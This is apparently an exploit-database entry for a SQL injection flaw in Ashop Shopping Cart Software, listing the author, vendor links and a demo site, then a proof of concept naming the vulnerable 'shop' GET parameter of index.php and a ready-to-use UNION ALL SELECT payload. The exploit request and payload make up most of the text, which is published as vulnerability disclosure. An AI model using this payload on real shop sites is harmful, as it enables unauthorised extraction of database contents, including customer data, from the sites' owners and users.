17 lines
No EOL
617 B
Text
17 lines
No EOL
617 B
Text
# Exploit Title: Ashop Shopping Cart Software - SQL Injection
|
|
# Date: 03.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: http://www.ashopsoftware.com
|
|
# Software Link: https://sourceforge.net/projects/ashop/
|
|
# Demo Site: http://demo.ashopsoftware.com/
|
|
# Version: Lastest
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
|
|
----- PoC: SQLi -----
|
|
|
|
Request: http://localhost/[PATH]/index.php?cat=1&exp=&shop=1
|
|
Vulnerable Parameter: shop (GET)
|
|
Payload: cat=1&exp=&shop=-5438') UNION ALL SELECT
|
|
CONCAT(0x71786b6a71,0x6357557777645143654a726369774c4167665278634a46617758614d66506b46434f4b7669565054,0x716a787671),NULL--
|
|
fmIb |